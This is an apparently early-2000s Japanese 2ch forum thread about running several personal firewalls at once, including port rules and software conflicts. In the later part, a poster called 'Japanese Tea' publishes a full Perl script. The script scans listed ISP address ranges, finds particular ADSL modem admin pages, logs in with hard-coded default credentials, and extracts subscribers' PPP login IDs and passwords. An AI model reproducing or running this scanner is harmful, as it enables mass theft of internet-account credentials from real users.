いっぱいFW入れてます。当たり前だゴルァ大作戦
at SEC
1:ナナツサソ
01/11/14 22:19
ファイアウォールは一つだけでいいのか?
一つだけは不安じゃないのか?
しかし複数入れて不具合は出ないのか?
そこんところ語る場登場。
2:名無しさん@お腹いっぱい。
01/11/14 22:20
2get
3:―――終了―――
01/11/14 22:23
分かってないので終了。
4:名無しさん@お腹いっぱい。
01/11/14 22:28
体験談きぼーん
5:名無しさん@お腹いっぱい。
01/11/14 22:29
相性が悪いと目されているもの
ゾネアラームとタイニー
6:
01/11/14 22:30
ZONEALARM、TINY、BLACKICE、VB2000
これで向う5年くらいは大丈夫
ヨカッタヨカッタ
7:名無しさん@お腹いっぱい。
01/11/14 22:36
「ZoneとTinyの二本立て」
Tinyで、ルールにないアプリケーションを許可するかどうかのダイアログが出てこない。
Ask for action when no rule is foundはチェックが入っている。
FireWall Enabledにも入っている。
レベルはAsk me firstである。
Zoneには、問題のアプリケーションを許可する旨のルールができている。
Zoneをシャットダウンして、Zoneのルールを削除してからアプリケーションを起動すると
Tinyから許可するかどうか聞かれる。
これは一体どういうことかと。
8:名無しさん@お腹いっぱい。
01/11/14 22:37
フクスウファイアオーるかたりばか
ところでwin2kなどに標準装備のtpc filteringとかの機能は触れてもいいの?
あと、複数使ってきたぜごらぁ というのは?
できたらタイトル拙者のものを使ってもらいたかったなり
9:名無しさん@お腹いっぱい。
01/11/14 22:39
>>7
Tinyで全てを拒否するルールを作って有効にしているとか・・・
違ってたらスマソ
10:(´ー`)y−~~~
01/11/14 22:41
いっぱいproxy噛ませてます。当たり前だゴルァ大作戦▲▼
1 名前:ナナツサソ 投稿日:01/11/14 22:19
プロキシサーバは一つだけでいいのか?
一つだけは不安じゃないのか?
しかし多段にして不具合は出ないのか?
そこんところ語る場登場。
2 名前:名無しさん@お腹いっぱい。 投稿日:01/11/14 22:20
2get
3 名前:――終了―― 投稿日:01/11/14 22:23
分かってないので終了。
11:名無しさん@お腹いっぱい。
01/11/14 22:42
スレ立てる前に、もうちょっと良く考えた方が良かったねえ。。
たしかにねえ、この話題は、いわゆる『がいしゅつ』ではないですよ。。
でもね、なぜ今まで、これと同じようなスレが立たなかったのか、
もうちょっと良く考えてみたらどうでしょうかねえ。。うん。。
つまりねえ、僕が言いたいのはね、これほどまでにつまらないスレはねえ、
いまだかつて、『誰も』考えたことすらない、ってことなんですよ。。
まぁその意味では、あなたには天与の才能があるってことなんでしょうけどね。。
でも、そんなこと何の自慢にもなりませんものねえ。。
まぁ、こういっちゃなんですがね、『ダメなやつは何やってもダメ』
ってことなんでしょうかね。。残念なことですがね。。
僕もこの2ちゃんねるに来るまではね、人はみな平等だ、って思ってましたよ。。
でもねえ、ちがったんですよ。。ダメなやつはダメなんですよ、何やっても。。
あなたも早く、そのことに気付いて欲しいものですね。。
『分相応』、それが一番、しあわせなんですから。。
まぁ、あまり気にしないようにね。。精神衛生上良くないですからね。。
こんなこと2ちゃんねるでは日常茶飯事ですからね。。じゃ、このへんで。。
ところで、こことは別の、あのクソスレもあなたが立てたの?
12:このような報告も
01/11/14 22:43
今までZoneAlarmだけでやってたんだけど、どこかからのアクセスを防いだときには
The firewall has blocked Internet access to your.........と出ていた。
2chに書き込む際のポートスキャンも記録されてなかった。
ところがTiny入れたら、Zoneのほうにポートスキャンの痕跡が大量に残るようになり、
警告もThe firewall has blocked routed traffic..........と変わった。
こりゃ何だと。
13:名無しさん@お腹いっぱい。
01/11/14 22:52
>>9
順に書く。
俺のとこはまずポート1から52まで拒否。
次に52から79まで。
81から442まで。
444-7999まで、
8001-8079まで、
8081-8430、
8432-65535。
このような設定をしておる。要はHTTP以外全部潰してる。
FTPができないと困るので、別個FTPソフト専用の「アプリケーション限定ルール」を作って対処。
だけど、時計合わせソフトが使えないんだこれが。
ポート53を使って時計サーバに繋ぐというから空けてるんだが、
何故か3番目のルールが適用されて繋げず。
>>8
もう何でもありにしよかー。
14:名無しさん@お腹いっぱい。
01/11/14 22:53
>win2kなどに標準装備のtpc filteringとかの機能は触れてもいいの?
ぜひ語って欲しい!
15:13
01/11/14 22:54
4行目、54から79だった
あと、時計合わせソフト専用のルールも作ってること書き忘れ。
16:名無しさん@お腹いっぱい。
01/11/14 22:59
再現するかが問題だが。
というかみんな一つでやってるのか。
17:名無しさん@お腹いっぱい。
01/11/14 23:02
>>13
漏れのTinyのルールは、上から・・・
Loopback anyport [127.0.0.1]:[anyport]
DNS anyport [anyadress]:[53]
OutGoing ICMP [8] Echo Request
Incoming ICMP [0] Echo Reply
アプリケーション毎に許可ルールを幾つか作って
最後にAllDenyって名前で全部拒否
つーかZoneとTinyどっちかに絞った方が・・・
ってな事言っちゃうと、このスレ・・・(;´Д`)
18:名無しさん@お腹いっぱい。
01/11/14 23:03
タイニーだけじゃ不安なんだよ!
ノートンなら
Cookieブロック、スクリプトブロック、ユーザーエージェントブロック(書き換え可)
Refferブロック(書き換え可)、ブラウザからのメールアドレス参照ブロック(書き換え可)
できるしさ!ノートンとタイニーで斎京。氷でもいいけどさ!
19:名無しさん@お腹いっぱい。
01/11/14 23:10
>>18
Tinyスレの722だよね。
今Zoneはどうしてる?
あとノートン+Tinyでは問題ないのかい。
20:名無しさん@お腹いっぱい。
01/11/14 23:13
色々試して様子見だよ!
21:名無しさん@お腹いっぱい。
01/11/14 23:13
俺はTiny+Proxomitronでやってる
22:名無しさん@お腹いっぱい。
01/11/14 23:14
問題ないっつーか、機能的にカブる。
独自のものもあるんだが・・・
23:名無しさん@お腹いっぱい。
01/11/14 23:20
難しいな
ニーズがない。
24:名無しさん@お腹いっぱい。
01/11/14 23:23
>>22
ノートン+Tinyではかちゅーしゃの件のように
新規プログラムを立ち上げてもルール作成を問い合わせてこない
といった目に見える不都合はおきていないのかい?
25:名無しさん@お腹いっぱい。
01/11/14 23:30
そういやないね。
ノートンはプログラム検出やってないんじゃないか?
26:名無しさん@お腹いっぱい。
01/11/14 23:32
書き方が悪かった
プログラムというか、パケットだけを見ているとゆーか。
27:名無しさん@お腹いっぱい。
01/11/14 23:39
以前やってたことあるな
tyny & zone
特にぁゃιぃ動作はしなかったな
至って快調だった
28:名無しさん@お腹いっぱい。
01/11/14 23:39
その不具合はFAQにも載ってないな。
29:名無しさん@お腹いっぱい。
01/11/14 23:39
tynyぢゃねえやtinyだ
アフォ丸出しすんまそ
30:悪かったんね
01/11/14 23:42
OSはWIN98で、
入れてるものでOSと同時起動するのは
VB2000
Tiny
Zone
あとはIMEとかサウンド音量調節のアレ
特に何もなさげなんだがなあ。
31:名無しさん@お腹いっぱい。
01/11/14 23:47
>>30
ほう。
インストールの順番を教えて。
あと新規にアプリを起動した時なんかはどういう順番で問い合わせてくるの?
ログもそれぞれどんなのか気になる。
32:ノートンもあった
01/11/14 23:54
インストールの順番は
VB2000
ノートン
Zone
Tiny
(FW3本起動させてるとき)
ついこの前Mozilla0.9.5入れたんだけど、まっさきに聞いてくるのはZone。
Zone許可するとノートンが
「Mozzilla.EXEがインターネットにアクセスしようとしています・・・云々」と聞いてくる。
こんなとき、Tinyはウンともスンとも言わない。
33:不明家族
01/11/15 00:01
Explorer.EXEというのがインターネットにアクセスしようとしている
ということを教えてくれるのは何故かZoneだけ。
ノートンは知らせてくれない。Tinyも黙りっぱなし・・・
別にWINアップデートも何もしようとしてないのに、Explorer.EXEが何故アクセスしたがるのかも不明、
ノートンがプログラムを検出するのなら、何故これを見逃すのかも不明、
ウィルスかと思ってノートンのアンチウィルス(体験版だけど)最新パターンとVB2000の最新版パターンで
チェックしても問題なし。う〜ん?
34:名無しさん@お腹いっぱい。
01/11/15 00:06
>>33
俺も同じ事あったよ、でもTinyは反応したけどな。
>Explorer.EXEが何故アクセスしたがるのかも不明
これはまったく不明
35:名無しさん@お腹いっぱい。
01/11/15 00:10
そんで、それは何故なのか検索しても、人に聞いても「わからん」なんだよな・・・
「なんで俺のとこのTinyは黙っているのか」も。
36:名無しさん@お腹いっぱい。
01/11/15 00:29
>Explorer.EXEが何故アクセスしたがるのか
フォルダをWebページで表示、にしているとか・・・?
んでエクスプローラで外部にリンクの貼られたhtmlファイルを選択したときとか・・・?
う〜、漏れのおつむじゃわからんちん(;´Д`)オバカデゴメンネ
37:名無しさん@お腹いっぱい。
01/11/15 00:33
MPEG4とかの動画ファイルのところにマウスポインタを持っていったと思われ
プレビュー関係の事ね
38:名無しさん@お腹いっぱい。
01/11/15 00:34
Explorer.exeが接続しようとする意味、WINFAQにあるんだけど。
シマンテックに問い合せたことあるが、許可して構わないとのこと。
39:名無しさん@お腹いっぱい。
01/11/15 00:34
ノートンはTinyみたいにアプリ毎にlocal/remoteのaddress,port指定はできるんだっけ。
すると
ノートン+Zone,Tiny+Zoneの組み合わせはは意味あるといえるのか(表面的には)。
40:WinFAQでも見よか
01/11/15 00:43
>>36>>37
それも考えた。極力外部にアクセスをしないよう設定してあると思うのだが・・・
メディアプレイヤー7も勝手にアクセスしようとする。アップデートの確認、Codecの自動ダウン禁止。
果ては個別識別禁止、プロトコルにはUDP6699を使うようにしてFWで塞ぐ。個別にも禁止ルールを使う。
が、やっぱりZone動いてるとTiny働いてくれんのだ・・・
>>39
そう、だから機能的にもかぶると見た。好きな方でいいと思う
検出が確実そうなZoneと設定でのブロックが確実そうなものを合わせたら良さそうだと考えた。
41:名無しさん@お腹いっぱい。
01/11/15 00:52
NIS+TinyよりTiny+Proxomitron+NAVの方がよいと思い混んでるけどどうよ?
42:名無しさん@お腹いっぱい。
01/11/15 00:57
>>41
それは無駄がない、意味のある組み合わせだか
スレの趣旨に反する。
43:名無しさん@お腹いっぱい。
01/11/15 01:15
Tinyは設定が難しいというイメージがあるね。
日本語での説明が少ないということもあるんだろうけどさ。
44:
01/11/15 15:34
ブラックアイスって
他のFWの後ろに隠れない?
ブラックアイスが先に探知することってあまり無い
(ほかのFWと一緒に入れてるとき)
45:名無しさん@お腹いっぱい。
01/11/15 16:27
>44 TINYと併用させてるけどTINY終了させると探知しまくるような...
46:名無しさん@お腹いっぱい。
01/11/15 16:48
>>42
このスレは冗長で、かなり無意味かもしれない組み合わせが
話題だからな。
47:名無しさん@お腹いっぱい。
01/11/15 16:59
>>32
それだけじゃ不安だろ。
ついでに
OUTPOSTとSYGATEも入れとけよ。
なんか動きがあるかもしれんぞ。
48:名無しさん@お腹いっぱい。
01/11/15 17:06
ZoneAlarmProとZoneAlarmを両方立ち上げているヤツは
さすがにいないだろうな。
49:名無しさん@お腹いっぱい。
01/11/15 17:32
それ(・∀・)イイ!!
>>32
Proも入れよう!!
50:名無しさん@お腹いっぱい。
01/11/15 18:15
10個位入れたやついないのか?
51:名無しさん@お腹いっぱい。
01/11/16 03:13
w2kのtcp/ip filtering使うとtinyよりも先に許可を出してしまう気がする
今、格闘中 他の防火壁も試してみて報告するよ さーらばじゃ
52:名無しさん
01/11/16 17:42
>>13
時計合わせ(NTP)はポート123では?
53はDNSだよ。
ちなみに53へのoutputを止めると名前解決出来なくなるはずです。
53:わーい
01/11/16 20:28
ノートン Personal Firewall & Zone, ノートン Personal Firewall & TPF は、正常に動いてまっせ。
Win98 上で tiny と Zone を同時というのも過去に試したけど、うまくいかなかったす(起動時に凍るので、DOS モードから強制的に Zone のフォルダを丸ごと削除で切り抜けるしかなかった)
54:名無し~3.EXE
01/11/16 22:10
最近In UDPで67番からlocalの68番あたりに来るのがやたら多くて
今のところは全部遮断してるんですがいいんでしょうか?
55:名無しさん@お腹いっぱい。
01/11/17 00:32
OSは何使ってるんですか?
NT?2000?
9xじゃシステムリソースが・・・・
56:名無しさん@お腹いっぱい。
01/11/17 00:45
>>54
ファイアーウォールソフトを2つ以上入れたら教えて進ぜよう
57:どうよ?
01/11/17 00:54
ノートン体験版、ブラックアイス体験版、ゾーンアラーム
58:54
01/11/17 01:27
今時95でTPFなんですが。システムリソースとなんか関係あるんですか?
59:名無しさん@お腹いっぱい。
01/11/17 01:31
>>55 のレスは>>53 に対してのもの。
・・・だろう。
60:マイドまん
01/11/17 03:16
>>52時計合わせソフトのヘルプより。
■ 技術的情報 ■
・プログラム作成にはMicrosoft Visual C++ 6.0を使用しております。
・インターネットに接続しているか確認する為、一定時間の間隔でDNSに対して参照を行っています。
またLANにて使用している場合は、ポート123(NTP)が接続できる環境である事。
俺もおかしいと思ったんだが、123行く前から蹴られる。
61:名無しさん@お腹いっぱい。
01/11/17 04:53
>>60
プロバイダのDNSとのやりとりの設定はうまくいってるの?
もっとも、これがうまくいってないとwebブラウジングにも支障が出るよな。
62:名無しさん腹減った。
01/11/17 05:36
で、効果的な組み合わせはどれなんだ?
俺は今のところNISとBIなんだが。
63:名無しさん@お腹いっぱい。
01/11/17 10:52
Tiny+Proxomitron+NAVこれだ!
64:名無しさん@お腹いっぱい。
01/11/17 17:01
誰か、Win2kのFilteringについて語って下さい。
65:名無しさん@お腹いっぱい。
01/11/18 19:29
ZoneProとProxomitron
これいいよ。
66:名無しさん@お腹いっぱい。
01/11/18 22:00
W98にSYGATE・ZONE・NIS(インストールした順)といれてますが。
SYGATE意味なさそう。働き者はZONE。
67:名無しさん@お腹いっぱい。
01/11/19 07:12
>>66 これってさ本当にzoneがいいってこと?
どうやって確かめているかが不明なんですけど.....
自分で自分をアタックとかやってみる人とかいないんですか?
おれは無理だけど
スキル的に
68:名無しさん@お腹いっぱい。
01/11/19 08:36
一番はZone。でも、リソースを食うので今はTPFを使ってる。どうせルーターもあるしね。
69:名無しさん@お腹いっぱい。
01/11/19 14:15
NAT
70:名無しさん@おなかイパーイ
01/11/19 15:37
>>69 ワラタ
FWとIDSの区別か付かない人たちが大半のスレ
71:>61三枚野郎
01/11/20 00:28
普通に見る分には支障ない。
けど、時計合わせだけなんかおかしいんだよな・・・
優先度を高くしてもおかしー。
今、色々試してるけど
72:名無しさん@お腹いっぱい。
01/11/20 19:42
で、結論は?FWを捨てて全ポート開放!!!!!!!!!
これでどうよ
73:名無しさん@お腹いっぱい。
01/11/20 20:17
>72
うん!それ最強!!
74:名無しさん@お腹いっぱい。
01/11/23 05:20
VB2002とは何のFWでも相性悪そうだよ。
75:
01/11/27 00:23
>>72
MX起動しなくても共有状態ですか?
76:名無しさん@お腹いっぱい。
01/12/01 02:56
えへへ
77:名無しさん@お腹いっぱい。
01/12/01 04:08
あはん
78:名無しさん@お腹いっぱい。
01/12/01 16:39
なまじ複数入れちゃうとね、
アンインストールに困る場合があるけど
やっぱり比較マンはやらずには
いられんのだなあ
うむ冒険者だよねうむ
79:名無しさん
01/12/06 18:04
NISとZONE入れてる。
この組み合わせはいいのか悪いのか。
80:名無しさん@お腹いっぱい。
01/12/06 18:11
PC初心者です
ウィンドウズXPにあらかじめ入っている
ファイアウォールの設定の仕方を教えてください。
お願いします。
いま、何の設定もしないで常時接続しているのですが
これは危険でしょうか?
81:名無しさん@お腹いっぱい。
01/12/06 18:42
FireWallの多用はシステムの競合を招くだけだからね。
82:名無しさん@お腹いっぱい。
01/12/06 18:42
>>72
最悪…
83:名無しさん@お腹いっぱい。
01/12/06 18:42
>>74
それは仕方ない。
84:名無しさん@お腹いっぱい。
01/12/06 18:44
>>79
周囲でその二つで不具合が出たと言うのは聞いた事が無いので、
とりあえず、良いんでないの?不具合が出てから、考えませう。
まぁ。不具合が出た事に気づいた頃には手遅れと言うのが多いが…(w
85:名無しさん@お腹いっぱい
01/12/06 20:15
>>84
そか、ありがとう。
とりあえず、このままいってみる。
>まぁ。不具合が出た事に気づいた頃には手遅れと言うのが多いが…(w
そんなこと言うなよ、おどおどしながら生活せにゃならんがな。
86:名無しさん@お腹いっぱい。
01/12/07 00:55
>>85
すまん。おどおどさせる気はなかったんだ。
んで、自分よりも詳しい友達にも少し聞いてみたが、同意見だったよ。
↓は全部嘘かもしれないと思いながら見てくれ。俺が寝不足と酒で朦朧としているのと、知識が無いのとでちゃんと覚えてない。
詳しく聞くとNortonの方は、一部分が詳しくくいこんでいないとか・・・?(うろ覚えですまん。
で、その場所をZONEらが、入っているとか。
とりあえず、ZONEとTinyとかの類は互いに、くいこむ場所が同じなのでヤバイと…。
ちゃんと覚えてなくて、すまん。
とりあえず、NortonとZONEの組み合わせは、今の所変な話も聞かないし、大丈夫と。
そのあたりの競合に詳しい方、補足・訂正頼む。(;w;/
87:名無しさん@お腹いっぱい。
01/12/07 01:06
ノートンとタイニーだと
たまに落ちることあり
重複するブロックルール作ってるときね
ノートンで「!」マーク出て、ノートンでブロックしたのかと思いきや
続けざまタイニーのアラートが出てそのまま無反応
あくまでも、毎度ではなく「たまに」ね
しかし確率少々高めの「たまに」
88:名無しさん@お腹いっぱい。
01/12/07 01:12
>>10とか
>>11に書いてあることをよく読みましょう。
89:名無しさん@お腹いっぱい
01/12/07 02:00
>>86
またまたありがとう。
安心して眠れるよ。
詳しい内容聞きたいけど、理解出来る自信なし。
でも少しずつ詳しくなっていかなきゃならんのだよなぁ〜。
90:名無しさん@お腹いっぱい。
01/12/07 02:22
Zoneが検出しまくりって言うのはどうでもいいポートスキャンとか
一生懸命知らせてくれるからだよ。
Tiny、Sygateはいちいちそれくらいのことでは騒がない。
うちはSygate、オミトロン、NAVで使ってる。
FWの重複使用なんて意味無いと思うけどな。
NIS+TinyがいいってやつはOutpost使っとけ。
これ一つで同じことができる。
91:名無しさん@お腹いっぱい。
01/12/07 02:30
それが「検出しまくり」よ
92:名無しさん@お腹いっぱい。
01/12/07 02:32
騒がないんじゃなくて、設定しないとブロックしないからだよ(ワラ
だからデフォではステルスにならずにクローズになっとるんやんけ
93:90
01/12/07 03:10
うちはルータで設定してるからShieldsUPでスキャンしても
全部ステルスだけどね。
94:名無しさん@お腹いっぱい。
01/12/07 04:19
>>92
ウソばっか
95:名無しさん@お腹いっぱい。
01/12/07 11:03
うちのFWは一生懸命、Microsoft Updateをブロックしてるよ。
96:名無しさん@お腹いっぱい。
01/12/07 17:56
え〜。不正を検地した時のポップアップの話題みたいですけど、
やっぱり、デフォルトで回数が一番多いのはZoneですね。
理由は>>90さんが書いてくれていますね。
Tinyの場合は、自分でポートなども指定する方なのと、
デフォルトでは検地してもポップアップを出さない設定になっているので、
初心者やZoneの人が使うと、「静かすぎてちゃんと動いてる?」になります。
安心してください。設定を間違えてなければ、静かなだけでちゃんと動いていますので。
97:名無しさん@お腹いっぱい。
01/12/08 02:29
ルーターはまた別だべヨ!
98:名無しさん@お腹いっぱい。
02/01/09 23:18
おもしろいので、age
99:Japanese
02/01/09 23:21
なぜそんなにFairewollを信じて居るんだろうね。
はっきり言ってアホだね。
ウヒヒ。
100:名無しさん@お腹いっぱい。
02/01/09 23:31
禿げ銅。
FaireWoooooooll
しんぢてる奴はアホだね。
漏れ、FireWallは一応入れてるけど。。
101:Japanese Tea
02/01/09 23:49
ぼくはFireWallソフトが入っていてもハックする真珠プログラムを完成させた。
はっきり言って天才だね
キッヒヒ。
102:名無しさん@お腹いっぱい。
02/01/10 00:08
>>101
つか、その手の奴、結構前からパケストなんかで既出だったような。。。
103:名無しさん@お腹いっぱい。
02/01/10 00:44
そもそも、何をハックするのだ?>>101
104:Japanese Tea
02/01/10 22:39
パソワードに決まっているだろ>>103
プロバイダーのユーザー名とパソワードがわかるとたのしいだろ
使い道を考案中だのね
ウッシシ。
105:Japanese Tea
02/01/10 23:28
あぁ僕ってすごいよ。
まじで。
FireWollがあっても、パスを奪取できるハッキングプログラムを作ったんだからね。
すごいだろ。
ケケケ。
106:名無しさん@お腹いっぱい。
02/01/10 23:31
>>105
おい緑茶、ネギ食ってるか?
107:Japanese Tea
02/01/10 23:38
信じてないだろ>>106
まぁバカにはぼくのハカープログラムは理解できないと思うがね。
メアドを教えてくれれば、プログラムを見せてやってもよいのだが、
貴様には公開する勇気はないだろうね。
ウッケケ。
108:名無しさん@お腹いっぱい。
02/01/10 23:43
マジレスしてすまんが >>105
そりはいったい、どこからパスを抜くのだ?
クライアントPCから? それとも プロバイダのサーバーPC?
109:Japanese Tea
02/01/10 23:50
そいつは簡単にはさらせないな。
まぁ凡人(106)にはそれぐらいしか想像ができないのだね。
あぁ発想が貧困だ。
まじでバカだね。
ハッカープログラムを教えて欲しければメアドを教えな。
それをみたら君でも理解できるかも知れないな。
いや無理だろうな。
ククク。
110:名無しさん@お腹いっぱい。
02/01/11 00:22
間に受けるなよ >>109
ついでに言っとくが、
そんなものによだれたらしとる109も
逝ってよし。
111:名無しさん@お腹いっぱい。
02/01/11 00:23
大介元気だなあ
112:名無しさん@お腹いっぱい。
02/01/11 00:25
なるほど。ソーシャルハクらしい…。
113:Japanese Tea
02/01/11 00:36
バカどもは信じないので、
まぁさわりの部分だけでも見せてやろう。
これだけでは意味はないがな。
ソーシャルハクではなさそうだろ>>112
メアド教えたら続きを見せてやるがな。
カカカ。
#!/usr/bin/perl
# ODN 61.123.128.0/19
# ODN 61.201.0.0/18
# Nifty 61.121.64.0/19
# Nifty 61.210.0.0/18
# RIMNET 202.247.144.0/21
if ($ARGV[0]=~/(\d+)\.(\d+)\.(\d+)\.(\d+)\/?(\d*)/) {
$ip[0]=$1;$ip[1]=$2;$ip[2]=$3;$ip[3]=$4;
$m=($5>=16)?$5:24;$c=2**(32-$m);
if ($m<24) {$ip[3]=0;$ip[2]=int($ip[2]*256/$c)*$c/256;}
elsif ($m>=24) {$ip[3]=int($ip[3]/$c)*$c;}
} else {print "example: hack.pl 61.210.6.0/24\n";exit;}
$|=1;$SIG{'ALRM'}='kill';
for ($i=1;$i<=$c;$i++){
$pid=fork;
if ($pid==0) {alarm 3;&ip;exit;}
push(@pida,$pid);
unless ($i%64) {
sleep 1;
if($#pida>=255){foreach $j (1..64) {waitpid(shift(@pida),1);}}}
$ip[3]++;
if ($ip[3]==256) {$ip[2]++;$ip[3]=0;}
}
114:名無しさん@お腹いっぱい。
02/01/11 00:40
150 名前:ゴマキの近所男。 投稿日:02/01/11 00:32
なにが問題になるのかというと、これは、誰がなにをインストールしていてなにをやっているかが、ディフォルトのパスワードで誰でも分かってしまうのである。
実際どうなるかというと、結果を一部取り出してみると・・・・
25.6.3.1.2.1 = "DVD-RAM Utility"
25.6.3.1.2.2 = "GIMP" Hex: 47 49 4D 50
25.6.3.1.2.3 = "GSview and Aladdin Ghostscript"
25.6.3.1.2.4 = "MEIMI"
25.6.3.1.2.5 = "Mjuice Media Support for Winamp"
25.6.3.1.2.6 = "Netscape Communicator 4.7"
インストールされているソフトウェアが丸見えだ。会社のマシンにゲームを入れていたり、さらにぁゃ?ぃゲームが入っていたりすると・・・。
これはほんの一部である。このような情報が1500行以上も取れるのである。他にも現在動いているプロセスやハードウェア構成など、誰でも取れる情報になっている。
このほうほうは、ルーターやサーバーなどのネットワーク機器を管理するときに使う方法と同じ方法で取得しているのだが、Windows2000の場合は普通では見れないような拡張がなされているため。インストールしてるソフトやプロセスなども分かってしまうのである。
おそらくこれは、セキュリティーホールではなく仕様である。
115:Japanese Tea
02/01/11 00:54
バカどもはこれぐらいのソースでも理解できないようだな。
おとなしくなったな>>110-112
あぁおれってバカにバカにされたのだな。
かなしいね。しくしく。
続きを知りたいか?>アホども
ヒントはオレがその昔にここで警告しているわ。
僕は明日、厨学校へいくのでそろそろねるぞ。
ケケケ。
116:なんか知らんが
02/01/11 01:21
普通はそんなに長い間、
こんな駄スレに貼りついてないだろ
117:名無しさん@お腹いっぱい。
02/01/11 03:12
>>113
これだけじゃ何をするのか分からんが、
ファイアウォールとかは関係なく使えるのか?
謎・・・
118:らくだ
02/01/11 13:43
>>113
このソースでは、パラメータの取得とforkシステムコール行っているくらいしか
分かりません。&ip の処理を教えてください。
119:Japanese Tea
02/01/11 17:45
なんだかあほっぽいヤツだと思ったが、実は本物だったりするのかな。
その続きを公開きぼーん>>Japanese Tea
でもさぁ、彼の言うとおりパスワードが盗めるというプログラムを公開したら、
法的にはどうなんだろうか?
少なくとも、パスを盗んで使ったらまずいと思われるがね。
どだろ?
120:119です
02/01/11 17:47
間違ってJapanese Teaを装ってしまった。
スマソ
121:名無しさん@お腹いっぱい。
02/01/11 20:56
>>114
それって、有名なアドミント・・・のHPのコピペじゃないか(ワラ
122:名無しさん@お腹いっぱい。
02/01/11 20:59
119
ジサクジエン失敗
123:名無しさん@お腹いっぱい。
02/01/11 21:14
そっかー。もぉいっそのこと全員名前をJapanese Teaにするか!
ココって所詮ネタスレだと思ってたが、マジレスしとる人居るの?
124:Japanese Tea
02/01/11 23:33
誰も信じていないようだな。
118は少しは分かるヤツらしいがね。
オレってFireWallなんて関係なしにパスが抜けるんだ。
しかもこの真珠プログラムはマルチスレッドで高速化処理も行っていたりするぞ。
だからパスをぬきまくりなんだぞ。
まぢですごいぞ>凡人ども
ククク。
125:↑
02/01/11 23:54
ああ凡人でよかった。凡人じゃなきゃこんな書き込みしてしまうんだ。
126:56kbpsさん
02/01/12 00:16
>>124
NTTのフレッツADSL(1.5M)のサービスを受けようと思ってる今年24の男ですが
先ほどオフィシャルペーシ(申し込みページ)゙を確認したところ、ADSLモデムを購入
若しくはレンタルとあります。実は当方もうNTT ADSL MODEM N-2を所有し
ており、レンタルも購入も不要なわけですがこういった場合どうしたらいいと
思います?
また自宅が中継基地局から3km位離れているのですがどのくらいの速度
が出るものなのでしょうか?(アナログ回線、特に最たるノイズ源なし)
127:Japanese Tea
02/01/12 00:27
凡人じゃないところをみせてあげよう。
コシ抜かすんじゃないぞ。
128:Japanese Tea
02/01/12 00:30
実行するとやばいことになるので、凡人はやめておいた方がよいぞ。
ウケケ。
#!/usr/bin/perl
# ODN 61.123.128.0/19
# ODN 61.201.0.0/18
# Nifty 61.121.64.0/19
# Nifty 61.210.0.0/18
# RIMNET 202.247.144.0/21
if ($ARGV[0]=~/(\d+)\.(\d+)\.(\d+)\.(\d+)\/?(\d*)/) {
$ip[0]=$1;$ip[1]=$2;$ip[2]=$3;$ip[3]=$4;
$m=($5>=16)?$5:24;$c=2**(32-$m);
if ($m<24) {$ip[3]=0;$ip[2]=int($ip[2]*256/$c)*$c/256;}
elsif ($m>=24) {$ip[3]=int($ip[3]/$c)*$c;}
} else {print "example: hack.pl 61.210.6.0/24\n";exit;}
$|=1;$SIG{'ALRM'}='kill';
for ($i=1;$i<=$c;$i++){
$pid=fork;
if ($pid==0) {alarm 3;&ip;exit;}
push(@pida,$pid);
unless ($i%64) {
sleep 1;
if($#pida>=255){foreach $j (1..64) {waitpid(shift(@pida),1);}}}
$ip[3]++;
if ($ip[3]==256) {$ip[2]++;$ip[3]=0;}
}
129:名無しさん@お腹いっぱい。
02/01/12 00:30
おい >>124
NTTの社員のパスを抜いて、126の調べてやれ。
130:Japanese Tea
02/01/12 00:31
waitpid(shift(@pida),1) while ($#pida >= 0);sleep 1;print STDERR "\n";
sub ip {$ipstr="$ip[0].$ip[1].$ip[2].$ip[3]";
$addr=pack('CCCC',$ip[0],$ip[1],$ip[2],$ip[3]);
$this=pack('S n a4 x8',2,0,"\0\0\0\0");
$that=pack('S n a4 x8',2,80,$addr);
socket(S,2,1,6); bind(S,$this);
unless (connect(S,$that)) {
print STDERR "$ipstr...refused \r";return;}
$fh=select(S);$|=1;select($fh);
print S "GET / HTTP/1.0\r\n\r\n";
while (<S>) {
$server=$1 if (/^Server: ([^\r\n]*)/);
$au=$1 if (/^WWW-Authenticate: Basic realm="(\w*)"/);}
close(S);
unless (($server=~/^ALLIS\/FOS/ && $au eq 'user')
|| ($server=~/^Apache\/1\.1\.3$/ && $au eq 'Config')) {
print "$ipstr...failed1 ($server)\n";return;}
$this=pack('S n a4 x8',2,0,"\0\0\0\0");
$that=pack('S n a4 x8',2,80,$addr);
socket(S,2,1,6); bind(S,$this);connect(S,$that)||return;
$fh=select(S);$|=1;select($fh);
&atur if ($server=~/^ALLIS\/FOS/);
&mega if ($server=~/^Apache\/1\.1\.3$/);
if ($suc==2) {print "$ipstr...ID: $id, Password: $pass ($server)\n";}
else {print "$ipstr...failed2 ($server)\n";}
}
sub atur {print S "GET /easy HTTP/1.0\r\nAuthorization: Basic Y29uZmlnOg==\r\n\r\n";
while (<S>) {
if (/NAME="PA_LOG"/) {/VALUE="([^"]+)"/;$id=$1;$suc++;}
if (/NAME="PA_PS"/) {/VALUE="([^"]+)"/;$pass=$1;$suc++;}}}
sub mega {print S "GET /cgi-bin/Basicset.cgi?basic_num=1&reloadmenu=1 HTTP/1.0\r\nAuthorization: Basic cm9vdDpyb290\r\n\r\n";
while (<S>) {
if (/NAME="send_id"/) {/VALUE="([^"]+)"/;$id=$1;$suc++;}
if (/NAME="send_passwd"/) {/VALUE="([^"]+)"/;$pass=$1;$suc++;}}}
sub kill {exit;}
131:Japanese Tea
02/01/12 00:33
ウケケケケケ。
132:aa
02/01/12 00:55
これはどうですか?
URLリンク(fa.puresilk.ac)
URLリンク(fa.puresilk.ac)
133:Japanese Tea
02/01/12 01:40
なんだよ誰も理解できないのか。
やはり2chにいてるやつはバカバッカスだな。
カカカ。
134:DoCuN
02/01/12 01:55
>>133お前バカだろ?
ソース書くならム板池よ
しかしPerlよみづれー
135:名無しさん@お腹いっぱい。
02/01/12 05:27
>>128
>>130
これを実行するとかなりやばいことになるぞ。
Perlのソースだから実行する人はほとんどいないと思われるが…。
読みづらいのは、分かりにくくするためにわざとやってるんじゃないかな。
何が起こってもしーらない。
まじ危ないからsage
136:名無しさん@お腹いっぱい。
02/01/12 13:08
たしかに読みにくいけど、HTTP のプロトコルのとこだけみれば
何やってるのか(何がしたいのか)はわかる。
web たててるサーバーが二つあって、認証のところに穴があって、
cgi がよめてしまう?
ちがうかな・・・
137:名無しさん@お腹いっぱい。
02/01/12 13:30
コメント文入れて再アップきぼーん(藁
138:名無しさん@お腹いっぱい。
02/01/12 13:39
>>128-130
